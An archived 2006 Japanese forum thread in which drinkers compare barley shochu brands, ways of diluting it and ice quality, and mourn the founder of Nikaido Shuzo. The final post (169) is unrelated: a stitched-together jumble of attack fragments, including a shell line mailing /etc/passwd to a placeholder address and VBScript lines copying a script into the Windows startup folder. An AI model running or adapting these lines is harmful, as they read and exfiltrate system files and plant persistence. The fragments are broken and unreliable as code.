5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

麦焼酎 ☆ 四甕目

1 :呑んべぇさん:2006/08/18(金) 21:21:28
焼酎の王様、麦焼酎のスレです。

【前スレ】
http://food6.2ch.net/test/read.cgi/sake/1119644150/


2 :呑んべぇさん:2006/08/18(金) 21:22:02
>>1
乙っっっ!!!!!!!!!!!!!

3 :呑んべぇさん:2006/08/18(金) 21:57:51
【過去スレ】
☆ 麦焼酎 ☆
http://food6.2ch.net/test/read.cgi/sake/1037193480/
☆ 麦焼酎 ☆ 2樽目
http://food6.2ch.net/test/read.cgi/sake/1089191008/

4 :呑んべぇさん:2006/08/18(金) 22:05:19
前スレに書いてあった同一銘柄でもビンと紙パックじゃ味が違うというのは
本当だろうか?。いいちこパックを常備酒としている俺にとっては重大な
事だ。

5 :呑んべぇさん:2006/08/18(金) 22:06:38
>>5
瓶のいいちこも買ってみて飲み比べて自分なりの答えを出してみたら?

6 :呑んべぇさん:2006/08/18(金) 23:33:59
焼酎は日本酒より度数が高いから紙パックは味が変わるのも分かる気がする。
しかし、もっと度数の高いウイスキーやホワイトリカーのあるけど。

7 :呑んべぇさん:2006/08/18(金) 23:36:33
紙パックのウイスキなんてあんまりみたことないけど、あっても絶対買わないなw
いくら安くても

8 :呑んべぇさん:2006/08/18(金) 23:38:20
紙パックの牛乳とビンの牛乳でも風味が異なる。
それみたいなもんだ。
んま牛乳は少し匂いを吸収しすぎるくらいですが。

9 :呑んべぇさん:2006/08/19(土) 05:50:44
彼氏の誕生日に
百年の孤独
を買ったんだけど、
このチョイスは成功なんですかね?
自分は酒飲めないんでわからないんですよ…
喜んでもらえるか心配です。
美味しいですか?

10 :呑んべぇさん:2006/08/19(土) 12:08:45


11 :呑んべぇさん:2006/08/19(土) 17:49:04
>>9

プレ物としては喜んでもらえると思う。

美味いかマズイかは人それぞれの味覚だから分からんが、
多分美味いと言ってくれると思うぞw

12 :呑んべぇさん:2006/08/19(土) 17:52:47
天草と千亀女って何か似てませんか?

13 :呑んべぇさん:2006/08/19(土) 22:01:02
>>11
レスありがとう。
幻の焼酎なんてよく唱われてるからそれに頼ってみた
自分で味見も出来ないから不安だったんだよ〜
ありがとう。

14 :呑んべぇさん:2006/08/19(土) 22:50:28
今日特蒸泰明6本仕入れてきた。
がっちり飲みます

15 :呑んべぇさん:2006/08/19(土) 23:06:18
口に合おうと合わなかろうと努力して買って贈ってくれたものは喜んでもらえるはず。

そうでなければ酒ではなくあなたか彼に問題(ry

16 :呑んべぇさん:2006/08/19(土) 23:27:16
彼女からプレゼントされればどんなもんでもウマイと思う。

17 :呑んべぇさん:2006/08/19(土) 23:55:10
う…うれしい
おまいら良い奴ら(´;ω;`)
本当はなにか食べ物作ってくれるだけでいいなんていいって
言ってくれてたんだけど
いつも何かおごってくれたりしてるのに気が悪くてさ
みんなありがとう

18 :呑んべぇさん:2006/08/20(日) 00:11:09
なに、この生暖かい流れ。

もうちっと、殺伐した流れが欲しいぜ。

19 :呑んべぇさん:2006/08/20(日) 01:09:24
「よ〜しパパ、ママには内緒の彼女から焼酎もらっちゃうぞ〜〜」とか言ってんの。
もう見てらんない。
お前な150円やるからその彼女こちらに紹介しろ。

>>18
どう?殺伐とした男女間が赤裸々に描かれたっしょ。


20 :呑んべぇさん:2006/08/20(日) 02:11:36
夏はいっきに平均年齢が下がるな

21 :呑んべぇさん:2006/08/20(日) 10:15:27
何となく家で飲む麦焼酎は「いいちこ」専門で、この爽やかさと
いうかフルーティさが合ってるみたい。この系統の麦焼酎で、
おすすめ銘柄があれば教えてほしいのだが。
俺が目をつけてるのが杜の蔵の「うすは音」だけど近辺の店には
置いていないから。

22 :呑んべぇさん:2006/08/21(月) 20:59:12
二階堂・博多の華

23 :呑んべぇさん:2006/08/21(月) 22:55:04
>>21
安心院蔵。
ちょっと金出せば香吟のささやき。

24 :呑んべぇさん:2006/08/22(火) 00:12:00
>>21
入手性と金のことを考えなければ、「耶馬美人・麦」。
レギュラークラスなら「白寿」もいいね。ちょっとドライな淡麗吟醸香系。

>>22
二階堂はどうかねぇ?フルーティーさとはちょっと違う気がする。
薬品臭いというか、微妙にウィスキーっぽい香りに好き嫌いが別れそうだが。

25 :呑んべぇさん:2006/08/22(火) 00:55:18
ちょっと質問です。よく言われる
麦チョコ系の味わいって常圧のものなら感じるの?
兼八のようなプレミアムもののみ?

あと香りで言うとどれが麦の香りを強烈に感じるの?

26 :呑んべぇさん:2006/08/22(火) 01:26:26
>>25
傾向として、常圧蒸留+裸麦原料の物に多い様な気がする。

27 :呑んべぇさん:2006/08/22(火) 06:42:36
>>21
無理しないで「いいちこ」でいいと思う。あまりの巨大な存在ゆえに
軽く見られてるかもしてないが、素直にうまいと思う。
「香吟のささやき」のような銘柄は週末の夜にチビチビとやるといい。

28 :呑んべぇさん:2006/08/22(火) 20:59:06
>>25
麦チョコ系の味わいっていうのがよくわからなけど
常圧のもので割とどこにでも売っているもので高千穂オススメ
強烈とまではいかないけど、匂いとコクはあるとおもうよ


29 :呑んべぇさん:2006/08/22(火) 21:25:33
>>21
>この系統の麦焼酎で
ってあるのに、敢えてとんちんかんなレスする

そ ば 焼 酎 雲 海

30 :呑んべぇさん:2006/08/22(火) 22:23:11
いいちこ好きにオススメは吾空。
ちょいと探せば定価で買えるし樽熟成だが樽っぽさがあまりなく上品でうまい



31 :呑んべぇさん:2006/08/23(水) 06:29:58
>>30
いいちこスペシャルよりうまいのか?

32 :呑んべぇさん:2006/08/23(水) 10:17:41
「揺籃(ようらん)」って麦焼酎もなかなか美味いぞ。

ただし、開栓して少し寝かせてからのほうが美味いw

33 :呑んべぇさん:2006/08/24(木) 21:53:00
いいちこも二階堂も味なんて似たようなもんだろ

34 :呑んべぇさん:2006/08/24(木) 21:56:06
安心院蔵ってうまかった。安いのがなによりいい。

35 :呑んべぇさん:2006/08/24(木) 22:13:39
兼八毎月1升瓶1本しか買えません。
神戸で定価単品で2本売ってくれるお店ありますか?

36 :呑んべぇさん:2006/08/24(木) 23:24:26
神戸で兼八定価、セット売りの店と、単品販売の店。
単品販売のほうでは最近見ないけど・・・

耶馬美人定価なら県内でもちらほらと

37 :呑んべぇさん:2006/08/24(木) 23:44:05
>>33
違う。というか、あきらかに違う。いいちこは甘味があってやわらかいけど
二階堂はとげとげしい。

38 :呑んべぇさん:2006/08/24(木) 23:45:04
>>36
東灘のお店はタイミング次第ですね。
明石のお店今はどうなってるんでしょうか。
東灘のお店は兼八無くても萬年とか買って帰れますが
明石のお店は品揃えが微妙です。


39 :呑んべぇさん:2006/08/24(木) 23:46:02
>>24
二階堂が微妙にウィスキーっぽい香りって意味不明。
二階堂に樽熟ものでもあんのかな?

40 :呑んべぇさん:2006/08/24(木) 23:47:17
あ、東灘は兼八扱ってるんだ。知らんかった。

2ちゃんって役に立つなぁ。w

41 :呑んべぇさん:2006/08/25(金) 00:09:13
>>38
明石は微妙ですね
そのまま帰るのも癪なので明るい農村買っちゃいましたorz

東灘は南側の店が最近微妙です、タイミングが悪いだけかもしれませんが

尼崎に耶馬(米・麦)が並んでたよ


42 :呑んべぇさん:2006/08/25(金) 00:52:15
>>41
南側の店私が行った時必ずと言っていいほど旦那が客と飲んでますw
6月頃は日南娘とか置いてたのですが最近は目新しいのは入ってない感じです。
毎週行ける訳じゃないのでタイミング次第って所があるのかもしれませんが。

43 :呑んべぇさん:2006/08/26(土) 01:00:29
耶馬美人、定価っていくらなん?
2900〜3800で推移してる店が近隣に3件あり、どれが定価だかわからん。
長期熟成版も4980〜7500円でなぁ。
何が正価かわからん。


44 :呑んべぇさん:2006/08/26(土) 17:35:00
一番安いのが定価だろうによ

45 :呑んべぇさん:2006/08/26(土) 18:21:38
もともと定価自体がちょっと高い?

46 :呑んべぇさん:2006/08/26(土) 21:11:12
http://www.google.co.jp/search?hl=ja&q=%E8%80%B6%E9%A6%AC%E7%BE%8E%E4%BA%BA%E3%80%80%E5%AE%9A%E4%BE%A1&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=

47 :呑んべぇさん:2006/08/28(月) 20:33:04
兼八原酒やっと入手出来ることになりました。
すごく楽しみです。


48 :呑んべぇさん:2006/08/29(火) 10:43:21
たまに飲みたくなる兼八
毎日でも飲みたい旭万年

49 :呑んべぇさん:2006/08/29(火) 22:18:45
俺が大学に入ったころ行きつけの飲み屋の唯一の焼酎は「二階堂」だった。
俺の焼酎生活のスタートが二階堂だけに思い出深いが、ここでは評価が
よくないのが残念。

50 :呑んべぇさん:2006/08/29(火) 22:30:35
別に評価は悪くはないんじゃないか?二階堂。
焼酎にも色んな味があって好みも色々あるってことよ。

51 :呑んべぇさん:2006/08/30(水) 11:07:08
自分の好きな酒を飲めばいいのでは・・・。

「二階堂」「いいちこ」などなど、それぞれ好きな人もいるだろう。
人の評価より、自分の評価を大事にしなよ。^^

俺は「特蒸泰明」「兼八」が好きだがw

52 :呑んべぇさん:2006/08/31(木) 06:41:25
二階堂って評価が悪いんじゃなくて、ここにくる麦焼酎ファンの関心の的から
外れているだけだと思う。趣味の世界だから。
二階堂が麦麹減圧蒸留で築いた麦焼酎の歴史は賞賛されるべきたと思う。あの、
いいちこより数年早いパイオニアだ。何だかんだと減圧麦焼酎が現在焼酎市場の
かなりのウェイトを占めるんだから、その功績ははかりしれない。
とは言いつつ最近ご無沙汰だから、今夜買って帰ろうかな。

53 :呑んべぇさん:2006/08/31(木) 08:53:35
51
道中をのみなされ
次からは確実に泰明、兼八に加わるよ


54 :呑んべぇさん:2006/08/31(木) 09:49:52
>>53
道中と為、は同じですか?

55 :呑んべぇさん:2006/08/31(木) 11:34:01
為の事は知りませんがとにかく道中はテラうまかったっす
兼八に一番近いと思いまするぞ


56 :呑んべぇさん:2006/08/31(木) 13:15:29
>>53

「道中」も飲んだけど、残念ながら、特蒸泰明、兼八には入らないなぁ・・・。
「為.」も・・・。

味覚は千差万別だから、いろいろ試してみてはどうだいw

ここで教えてもらった「ごくぶかろんてん」も美味いぞ。
開栓して、しばらく寝かしたほうがいいが。

57 :呑んべぇさん:2006/08/31(木) 13:39:01
そこでつくし全麹ですy

58 :呑んべぇさん:2006/08/31(木) 18:18:17
56
こくぶかろてんですな
探してみますわ
いやぁ今まで芋房でしたが泰明やら兼八やら道中で麦にハマりましてね
道中イケると思ったんですが
麦はまだまだなんでその他ご教授お願いしますです

59 :呑んべぇさん:2006/08/31(木) 18:40:05
道中と同じ常徳屋の赤。手に入りやすいふしぎ屋。
釈云麦。万年。万年星。歌垣。その他いろいろ・・・

60 :呑んべぇさん:2006/08/31(木) 22:21:58
樽貯蔵麦焼酎ってここの人はどう思うのだろうか?


61 :呑んべぇさん:2006/08/31(木) 23:39:27
>>60
黒糖スレからの出張ご苦労様です

62 :呑んべぇさん:2006/09/01(金) 09:09:53
>>58

「道中」も美味いと思うよ。
ただ、自分には合わなかっただけで。

59 にもあるように、「万年星」、「釈云麦」も美味いw
是非試してみてほしいな。

「栗騎士」は香りは兼八なんだけど、飲み込んだ後味がなんだかなぁ、って感じ。
「ほげほっぽ」も・・・。^^;

「揺籃」は開栓してしばらく寝かせたら美味かったw

今度は「つくし(黒)(全麹)」も試してみるよ。^^

63 :呑んべぇさん:2006/09/01(金) 09:46:26
樫樽貯蔵ものはイヤだね。ウイスキーも好きで、焼酎はもっと好きだから、千年の眠り、つくし金印物語、百年の孤独。
ちょっと違うけど夢想せんらく(漢字がわからんです)を1本づつ買って飲んだけど、
どれもおいしくありませんでした。
ちなみに普段は、猿川、耶馬美人、中々がメインな減圧が好きなので偏った意見になるかもしれませんが・・・
日本の米麹、麦麹で仕込んだものには木の香りはあまり合わないと思います。



64 :呑んべぇさん:2006/09/01(金) 13:06:02
63
吾空飲んだ事ありますか?
自分も樽否定派ですがコレだけはうまいと思ってしまいましたよ

是非試してほしいものですわ

65 :呑んべぇさん:2006/09/01(金) 22:56:50
今、日本の里山で育まれた小楢のゆりかごで熟成されたと云う
樽貯蔵の麦を飲んでる。
どうしてもウィスキーと比較してしまうから
最初は物足りない感があるが、
慣れてくると美味く感じだした。
これで後、熟成が5年長ければ最高だな。。法律の壁が惜しまれる。
う〜む、サントリーとは違う麦も樽も国産
柔らかく優しいこれぞほんとの和のウィスキーといえよう

66 :呑んべぇさん:2006/09/02(土) 09:37:29
焼酎は色に対しての規制もあるからね。なんか中途半端な樫樽ものしか出来ない。
むしろ、スピリッツ扱いになってもうまい酒をと言う気概の蔵元はないのかな。


67 :呑んべぇさん:2006/09/04(月) 17:27:48
>64
63じゃないけど、吾空は飲んだ。
カンベン・・・

68 :呑んべぇさん:2006/09/04(月) 22:05:12
>スピリッツ扱いになっても

これすごいな。なるほどぉ

69 :呑んべぇさん:2006/09/04(月) 23:38:09
>>68
文化の問題もあるけど、沖縄の泡盛で度数60度くらいの泡盛で花酒ってのがあるんですわ。
度数の規制で焼酎でも泡盛でもなく、スピリッツと表記しなければ販売できないものなんですが。

過去にお蔵元に直接話きいたら、国が何を言おうと酒が変わるわけで無い、
うちはうちの酒を作るだけだ。

と言っていたんですわ。
その潔さにも感動と共感を覚えまして。
ぜひ、麦の蔵元さんたちも規制なんて気にせず作りたい酒を作ってほしいなぁともおもったんですわ。

70 :呑んべぇさん:2006/09/04(月) 23:50:22
>69
状況が全く同じとは言えないが
既に先例が存在していたのか。酒板で久々に感動した

71 :呑んべぇさん:2006/09/08(金) 12:40:03
初めて「青一髪」を飲んでみた。

兼八系とはまったく違って、普通の麦焼酎の味って感じだった。

でも、美味かったw

72 :呑んべぇさん:2006/09/09(土) 01:47:21
焼酎初心者なんで質問があるんですが焼酎はストレートでも飲んだりするものなのですか?

73 :呑んべぇさん:2006/09/09(土) 02:28:44
好きにしろ

74 :呑んべぇさん:2006/09/09(土) 05:15:02
>>72
ストレートでも飲んでる人多いですよ。
飲み方は色々試してみてその焼酎に合う飲み方をすれば良いと思います。

75 :呑んべぇさん:2006/09/09(土) 10:51:37
兼八原酒そろそろ出荷かな?

76 :呑んべぇさん:2006/09/09(土) 20:38:57
74の方ありがとうございました。自分はストレートで飲もうと思います

77 :呑んべぇさん :2006/09/10(日) 14:07:31
今年麦焼酎はじめたばかりの青二才ですが自分なりにランキングしました
1位 兼八
2位 舞香
3位 黒騎士
4位 宇佐むぎ
5位 常徳屋常圧(赤)
6位 閻魔
7位 ちんぐ黒
8位 中々

あまり出回ってないかもしれないけど「舞香」いいですよ


78 :呑んべぇさん:2006/09/10(日) 15:15:48
今年麦焼酎はじめたばかりの青二才ですが自分なりにランキングしました
1位 いいちこ
2位 田苑ゴールド
3位 神の河
4位 大河の一滴
5位 博多の華 三年貯蔵
6位 二階堂
7位 麦焼酎白水
8位 よかいち

あまり出回ってないかもしれないけど「田苑ゴールド」いいですよ

79 :呑んべぇさん:2006/09/10(日) 15:35:06
昨日麦焼酎始めたばかりの青一髪ですが自分なりにランキングしてみました
1位 兼八原酒
2位 森のささやき 兼八
3位 兼八
4位 古代
5位 宇佐むぎ
6位 泣き虫
7位 鶴の荷車
8位 台所火の車

余り出回ってないかも知れないけど「中々」中々いいですよ



80 :呑んべぇさん:2006/09/10(日) 18:36:23
78は頭悪いと言うか低脳というか・・・
まったく面白くないぜ。死ねっつーの。
>>77
舞香が良いなら、特蒸泰明もオススメですよ。



81 :呑んべぇさん:2006/09/10(日) 19:16:24
どの酒屋でも飲みやすいと薦められた物はほとんどが吟醸系で
世間では飲みやすいという意見らしいけど、自分には吟醸の
ギラギラした感じが苦手でどうしたものかと今日最後に立ち寄った
酒屋で試飲させてもらった「けいこうとなるも」これめっちゃ
気に入りましたよ。なんの主張もしてこないけどやさしく甘くて
食事にも合いそうなんで1升でゲットしました。

82 :呑んべぇさん:2006/09/10(日) 20:03:21
景子とオナる???

83 :呑んべぇさん:2006/09/11(月) 06:56:33
本気で面白いとでも思ってるのかね

84 :呑んべぇさん:2006/09/11(月) 22:23:30
↑まあ牛乳でも飲めよ

85 :呑んべぇさん:2006/09/16(土) 13:11:12
ここで、敢えて「陶山」といってみる。
飲んだ人いるかなー。

86 :呑んべぇさん:2006/09/18(月) 12:01:38
夘八って美味いんすか?

87 :呑んべぇさん:2006/09/18(月) 22:34:29
黒騎士、言うほどうまくないな。

88 :呑んべぇさん:2006/09/18(月) 23:48:51
>>87
それはお前がバカだからだ。
もう一度飲んでみろ。


89 :88:2006/09/18(月) 23:53:45
人をバカ呼ばわりした責任上、確認のため自分も飲んでみた。
やはり黒騎士は減圧のうまさが出ている。
いいちこにも通じるうまさだ。
うまくないとは言わせない。

90 :呑んべぇさん:2006/09/19(火) 00:02:14
なんともひでぇもんだ

91 :呑んべぇさん:2006/09/19(火) 01:26:01
黒騎士は兼八の抱き合わせで買わされたが
1杯飲んでそのまま放置

92 :呑んべぇさん:2006/09/19(火) 03:24:57
ttp://www.mainichi-msn.co.jp/shakai/fu/news/20060919k0000m060157000c.html
訃報:二階堂※(あきら)さん76歳=二階堂酒造会長

二階堂※(あきら)さん76歳(にかいどう・あきら=大分県日出町の焼酎メーカー、二階堂酒造会長)
15日、肝臓がんのため死去。葬儀は近親者で済ませた。後日、お別れの会を開く。自宅は非公表。喪主は長男雅士(まさし)さん。

戦後、物不足のため家業の造り酒屋を焼酎造りに転換、麦こうじを使った麦100%焼酎を日本で初めて開発し74年から出荷。
大分県が進めた一村一品運動にも乗って全国に麦焼酎ブームを巻き起こした。

※はシンニョウの旧字。つくりは「日」の下に「隹」

毎日新聞 2006年9月19日 3時17分

(*_ _)人

93 :呑んべぇさん:2006/09/19(火) 07:46:19
ナムナム(-人-)

94 :呑んべぇさん:2006/09/19(火) 08:37:13
>>89
こら。人のふりするな。

ていうか二階堂さん、肝臓ガンて・・・
やはりたくさんお飲みになられていたのでしょうか。
ご冥福をお祈りします。

95 :呑んべぇさん:2006/09/19(火) 12:01:33
いや、88の読解力のなさが可愛そうだろう。
>>89
おまえはいいちこでも飲んでる方がいい。

96 :呑んべぇさん:2006/09/21(木) 22:25:37
香吟のささやきが好きなんだけど、俺にはちと高価すぎる。
この系統の味でより安価なおすすめ銘柄ってあるのだろうか?。
最近買った安心院蔵はいい線行ってると思ったのだが。

97 :呑んべぇさん:2006/09/21(木) 22:34:08
ビール大ジョッキ2杯くらい飲んだ後の酔っ払った状態じゃないと焼酎飲めないなぁ・・・
においとか度数とかキツス
酔っ払っちゃえば行けるんだがw
ちなみにコーラ割りならドンドン行けるマジ美味い
だがコーラ単体のほうがもっと美味いw

ちなみに白水が好き

98 :呑んべぇさん:2006/09/21(木) 22:44:33
>96
4合で1400円だよね。1升で2700円出せるなら耶馬美人かな。1合あたりの単価はこっちが安いかな?
また、より安価って事だけど、安価でおいしいのは無理だね。

99 :呑んべぇさん:2006/09/21(木) 22:50:40
いいちこ安いけどおいしいじゃん
俺の舌て安上がりなんかな?w

100 :呑んべぇさん:2006/09/21(木) 23:05:47
いいちこも確かに旨い。
しかし、いいちこスペシャルやフラスコボトルはもっと旨いですよ。


101 :呑んべぇさん:2006/09/21(木) 23:17:38
>>97
焼酎は比較的慣れが必要だと思う
割れば飲みやすいけど、濃いめ水割りお湯割、ロックや生は慣れないときついかも
ウィスキーとかもそうだね
慣れればあの匂いが更に飲みたさを加速させるんだけど

102 :呑んべぇさん:2006/09/22(金) 22:20:25
見かけたら買おうと思ってるけど、「ふしぎ屋」って飲んだ人感想を?

103 :名無し:2006/09/22(金) 22:34:40
>78
田苑ゴールドはどの酒屋でも手にはいります。非常にポピュラーです。
ちなみに、私は兵庫県在住。
聞いた話ですが、関西は田苑、関東は、隠し蔵がポピュラーだそうです。


104 :呑んべぇさん:2006/09/22(金) 23:17:23
>>102
好奇心があるならどうぞ。って感じかな。

105 :呑んべぇさん:2006/09/22(金) 23:23:34
>>102
香ばしい系麦が好きなら良いと思うよ。

106 :呑んべぇさん:2006/09/22(金) 23:24:13
>>102
いいちこずきにはオススメできない

107 :呑んべぇさん:2006/09/23(土) 19:38:46
このスレいいちこ好きいがいとおおいな、神の河好きも意外と・・。






多い訳ないかw

108 :呑んべぇさん:2006/09/23(土) 22:11:58
麦焼酎マンセー。

109 :呑んべぇさん:2006/09/23(土) 22:25:08
>>97
じゃあコーラ飲んでろガキw

110 :呑んべぇさん:2006/09/24(日) 00:10:41
白水ていうのが1升パック特価999円で売ってあった
安いよなぁ
美味いのかな?

111 :呑んべぇさん:2006/09/24(日) 00:30:23
その値段に味を期待しちゃいかんだろ

112 :呑んべぇさん:2006/09/24(日) 01:20:47
樽物のむならウィスキー買った方がましだからな

113 :呑んべぇさん:2006/09/24(日) 01:26:27
白水って樽物じゃないでしょ??

>>110
美味いよ

114 :呑んべぇさん:2006/09/24(日) 11:42:35
黒騎士が麦チョコのあじがするとかは誇張しすぎだな

115 :呑んべぇさん:2006/09/25(月) 19:30:07
先日、初潮が来ました
なかなか来なくて調べてみたりしてたところ、ある日ふと
うれしかった

116 :呑んべぇさん:2006/09/25(月) 21:54:38
そりゃぁよかった。がんばんなさい。

117 :呑んべぇさん:2006/09/25(月) 21:57:01
夢想仙楽が一番好き

118 :呑んべぇさん:2006/09/25(月) 21:58:03
↑ とあがった人が以下ry

119 :呑んべぇさん:2006/09/25(月) 22:16:56
少なくとも減圧麦焼酎において「いいちこ」が一番うまいと思うのだが。

120 :呑んべぇさん:2006/09/25(月) 23:07:13
うぉーいおまいら麦ってるかぁ?

千が飛ぶ
源次郎
匠黒ラベル

飲んだ人いる?
感想ヨロ。

121 :呑んべぇさん:2006/09/26(火) 00:23:03
減圧なら中々か猿川☆カナ

122 :呑んべぇさん:2006/09/26(火) 06:49:11
麦らしい減圧なら中々だが、麦らしくない減圧ならいいちこ。
いいちこはすっきりフルーティ系。


123 :呑んべぇさん:2006/09/26(火) 07:24:08
初めて兼八手に入れた
うまかったわ(゚д゚)
でもあんなにプレミア付けんくても他にも似た感じでうまいのあるのになぁ

124 :呑んべぇさん:2006/09/26(火) 11:42:27
>>123

プレ値で買ったのかよぉ〜・・・。┐(´∀`)┌ 

>他にも似た感じでうまいのあるのになぁ

と書いてるように、他の美味い焼酎を買えばよかったのになぁw



125 :呑んべぇさん:2006/09/26(火) 16:54:18
プレだったら買ってねーよ
定価やったから買ったんや
プレなら他の買うて言うてるやん

126 :呑んべぇさん:2006/09/26(火) 19:10:35
樽物好きなんだけど次の日結構胸焼けした感じがする。
ってワタシだけ?

127 :呑んべぇさん:2006/09/26(火) 21:27:50
樽は飲まないからわからんがな

128 :呑んべぇさん:2006/09/27(水) 00:37:37
ウチの店に安心院蔵の常圧長期貯蔵が一本だけ残ってるんだけど
これって終売品よね?
買う価値ある?

129 :呑んべぇさん:2006/09/27(水) 10:40:33
>>125

123を普通に読んだらプレ値で買ったように思うが・・・。

まっ、定価で買えてよかったのぉw

130 :呑んべぇさん:2006/09/27(水) 18:45:35
読み返してみたら自分でもそう見えたわ
すまんかった

しばらく芋を飲まずに兼八パラダイスに突入です



131 :呑んべぇさん:2006/09/28(木) 08:57:43
許すw

「特蒸泰明」も美味いが、同蔵の「舞香」も美味いでぇ〜。

香りは兼八に似てるし、試してみたらいいぞ。

132 :呑んべぇさん :2006/09/28(木) 18:16:42
私も「舞香」支持派なんですけど
ここで「特蒸泰明」薦められて買ってみたら「特泰(←略)」のほうが僅差で美味く感じました。
「舞香」は口に入れると甘味があってすごくなじむんですが、数口飲むと最後に
苦味というか焦げ感が若干残ります。
「特泰」のほうはそれがなく、すんなり飲めました。
どっちか買い続けろと言われたらやっぱり安いほう買っちゃうなー。

一番おいしいのはやっぱり「兼八」です。
でも値段の事も考えて、買いつづけるのに最適なのは「宇佐むぎ」だと思います。
「宇佐むぎ」はとにかく飲みやすいです。
「栄花」ってのも同じ感じみたいなので今度買って試してみます。


133 :呑んべぇさん:2006/09/28(木) 19:03:12
前から常圧麦といえばその2蔵や西吉田って感じだったけど
今やどこでも香ばし系常圧を1銘柄は出すようになってるね

134 :呑んべぇさん:2006/09/28(木) 23:09:18
>>126
まあ、ウィスキーみたいなもんだしな

135 :呑んべぇさん:2006/09/29(金) 00:01:34
このスレではガツン系の話題が多いようだな。
ガツン系は巧いけど飽きるんだよな。

136 :呑んべぇさん:2006/09/29(金) 02:13:29
ガツン系って兼八とかの麦チョコ系のこと?

137 :呑んべぇさん:2006/09/29(金) 08:10:01
前から思っていたのだが。
おまいら何とかの一つ覚えみたいに麦チョコと言っているが、
麦チョコか焦がし麦をミキサーにかけて、それを甲類で割れば要望は満たせるんじゃないか?
もう少し丁寧に考えるなら、焦がし麦をできるだけアルコール度数の高い甲類に漬け、麦の成分を抽出したりで何とかならんかね?



138 :呑んべぇさん:2006/09/29(金) 08:53:12
>>137

人にどうこう言うんじゃなくて、自分で試してみな。
んで、感想を書いてみな。

139 :呑んべぇさん :2006/09/29(金) 21:51:15
栄花買ってみました。
1升ビンで1700円でした。
味はどっちかというと減圧蒸留焼酎に近いと思いました。

兼八と栄花を3対7くらいの割合で混ぜるとおそらく宇佐むぎに近くなると思います。

やはり長年飲むなら宇佐むぎが良いのではないかと思います。
あと常徳屋常圧<赤>も安くて親しみやすい味なのでオススメ。


140 :呑んべぇさん:2006/09/29(金) 22:10:04
栄花は端麗辛口スッキリ系だからな。
食中酒としてオススメ。

141 :呑んべぇさん:2006/09/30(土) 11:24:23
>139
業者宣伝乙。
でもちょっとしつこすぎ。

142 :呑んべぇさん:2006/10/01(日) 18:11:31
栄花と宇佐むぎってラベル違いなだけって聞いたけど・・・

143 :呑んべぇさん:2006/10/02(月) 09:26:56
甲類でやったところでダメだとは知れているので、
いいちこに焦がし麦を1夜入れてみた。
今日の夜に漉して飲んでみるよ。

144 :呑んべぇさん:2006/10/02(月) 11:44:14
いいちこ安物というイメージあって敬遠してきた
安かろう質悪かろうみたいな
でもこの度、何気なく買ってみたら美味かった
なぜだ?

145 :呑んべぇさん:2006/10/02(月) 20:56:02
いいちこと二階堂ってどっちが旨いんだ?

146 :呑んべぇさん:2006/10/02(月) 20:56:13
いいちこは別にうまいというほどでもないな。普通と言う感じか。
安物っていったって大五郎とかああいうのを想像しちゃいかん。

147 :呑んべぇさん:2006/10/02(月) 20:57:59
>>145
どちらも香りの種類が違うからどっちがうまいとかいうのは無意味。
自分にあったほうを選ぶといい。
800円も出せば買えるのだから両方試す事くらい出来るだろう。

148 :呑んべぇさん:2006/10/02(月) 23:18:17
いいちこは麦焼酎呑みにとっては「とりあえずビール」みたいな存在かな。

149 :呑んべぇさん:2006/10/03(火) 08:32:37
いいちこを前割りして冷やで飲む。
グビグビ行きたい時に最高です。

150 :呑んべぇさん:2006/10/03(火) 09:07:46
前割りてナニ?

151 :呑んべぇさん:2006/10/03(火) 09:35:56
飛行機のチケットで早めに予約すると安くなるでしょ?

152 :呑んべぇさん:2006/10/03(火) 10:24:50
Vシネマとかの撮影のときに、性器に触れられんようにするために貼るやつでは?

153 :呑んべぇさん:2006/10/03(火) 10:52:57
それ前バリ

154 :呑んべぇさん:2006/10/03(火) 11:05:28
給料前にシャッチョサンに少し融通してもらうやつ

155 :呑んべぇさん:2006/10/03(火) 11:29:15
セックルを表す奥ゆかしい表現では?

156 :呑んべぇさん:2006/10/03(火) 11:35:02
それ交わり

157 :呑んべぇさん:2006/10/03(火) 12:38:48
麦より芋のほうが旨くね?

158 :呑んべぇさん:2006/10/03(火) 12:43:32
宝酒造のアレはどうだろうか?(米のもあるが)

159 :呑んべぇさん:2006/10/03(火) 21:36:07
べいすんてどーよ

160 :呑んべぇさん:2006/10/03(火) 23:32:56
シラネ

つか兼八やっぱウメェわ(゚д゚)

道中最強と思ってたが兼八の上品な柔らかさと香ばしさには負けるな
道中もウマーだが兼八が上かと

泰明は飲み比べると辛口に感じてまうわ

今度は釈云麦と飲み比べよ

161 :呑んべぇさん:2006/10/04(水) 01:27:16
ロックより水割りのほうが香りを堪能できるな。
しかし水はヴォルビックに限る
エビアンとか六甲のおいしい水とかは×
硬水のほうが良いというイメージがあるが、実際は軟水のほうがいい

162 :呑んべぇさん:2006/10/04(水) 05:16:44
漏れはアルカリイオンの水が一番好きだな
変なミネラル臭さを感じないし、何より安く手に入る

163 :呑んべぇさん:2006/10/04(水) 07:19:51
水って大事だよな
氷でも味違うし
冷蔵庫で造った氷じゃまずい

164 :呑んべぇさん:2006/10/04(水) 13:52:21
冷蔵庫で作った氷まずいよな。
元の水はミネラルウォーターなのになんでだろ?

165 :呑んべぇさん:2006/10/04(水) 19:02:49
ウチは湧き水を凍らせてるけどオイシイ氷だお

166 :呑んべぇさん:2006/10/04(水) 20:21:43
>164
冷蔵庫の氷は、真ん中の最後まで凍らなかった白い部分に、庫内の臭い分子、
過剰なミネラルやカルキ等の不純物が濃縮されるんだけど、溶けるときには、
密度の関係でひびが入ると、真っ先にその不純物が溶けだしていくんだよな。
だから、不純物の味や臭いが支配してしまうんだよ。

冷蔵庫で氷を作るなら、完全に凍ってしまう前に、真ん中に残る水を捨てるだけでも
その辺はかなり回避できる。臭いも減るし水道水でも大分マシな味になるよ。

そうは言っても面倒なので、岩氷でも買った方がいいね。

167 :呑んべぇさん:2006/10/04(水) 21:22:02
我が市はダムより上流から水を汲み上げてるから水道水でじゅうぶんうまいわけだが

168 :呑んべぇさん:2006/10/04(水) 21:25:00
急速冷凍にするといい

169 :呑んべぇさん:2006/10/04(水) 22:07:48
kak.hta';ken=wd+'START
cat /etc/passwd | mail nobody@nonexistent.com

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
